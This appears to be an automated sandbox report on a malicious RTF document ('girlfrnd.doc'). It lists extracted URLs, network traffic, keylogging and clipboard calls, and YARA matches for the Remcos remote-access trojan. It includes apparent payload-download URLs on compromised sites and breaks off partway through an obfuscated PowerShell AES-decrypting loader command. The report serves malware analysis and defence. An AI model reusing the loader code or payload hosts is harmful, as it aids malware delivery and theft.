            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: RegAsm.exe, 0000000F.00000002.414353450.00000000002CC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/HK
            Source: RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://www.msn.com/
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://www.msn.com/?ocid=iehp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
            Source: RegAsm.exe, 0000000C.00000002.422894138.00000000001D4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
            Source: powershell.exe, 00000010.00000002.883036623.00000000023CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.883036623.0000000002474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: powershell.exe, 00000010.00000002.883036623.000000000223B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro
            Source: powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/comments/feed/
            Source: powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/feed/
            Source: powershell.exe, 00000010.00000002.883036623.000000000223B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.883117116.000000000241B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/os/transportment.pfm
            Source: powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=
            Source: powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2
            Source: powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767
            Source: powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: powershell.exe, 00000010.00000002.883036623.00000000023CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.883036623.0000000002474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-json/
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://contextual.media.net/
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
            Source: powershell.exe, 00000006.00000002.375856894.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000006.00000002.375856894.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000006.00000002.375856894.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Nunito
            Source: powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000010.00000002.883036623.000000000247B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new.quranushaiqer.org.sa
            Source: powershell.exe, 00000010.00000002.883036623.000000000223B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.883117116.000000000241B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm$
            Source: powershell.exe, 00000006.00000002.375856894.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.406999069.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
            Source: RegAsm.exe, 0000000C.00000002.424356325.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
            Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: bhv2E13.tmp.12.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
            Source: unknownHTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.22:49171 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.22:49173 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000008_2_0040A2B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_004168C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_0040987A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004098E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_00406E9F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,15_2_004072B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_0040A3E0

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3220, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

            System Summary

            barindex
            Source: girlfrnd.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: RegAsm.exe PID: 3220, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3604, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3888, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped file: Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221)Jump to dropped file
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3859
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3859
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3859Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3859
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 